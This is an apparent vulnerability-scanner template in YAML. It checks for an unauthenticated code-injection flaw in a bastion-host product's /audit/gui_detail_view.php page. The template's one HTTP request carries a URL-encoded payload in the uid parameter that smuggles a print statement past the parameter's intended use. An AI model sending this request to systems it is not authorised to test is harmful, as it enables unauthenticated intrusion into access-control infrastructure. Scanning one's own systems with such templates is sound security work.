id: poc-yaml-qzsec-ris-acm-gui-detail-view-php-unauth

info:
  name: poc-yaml-qzsec-ris-acm-gui-detail-view-php-unauth
  author: Raiynin
  severity: medium
  tags: xray-converted,unauth
  reference:
    - https://idc.wanyunshuju.com/aqld/2108.html

http:
  - raw:
      - |
        GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "\xe5\xa0\xa1\xe5\x9e\x92\xe6\x9c\xba"
          - "\xe9\x94\x99\xe8\xaf\xaf\xe7\x9a\x84id"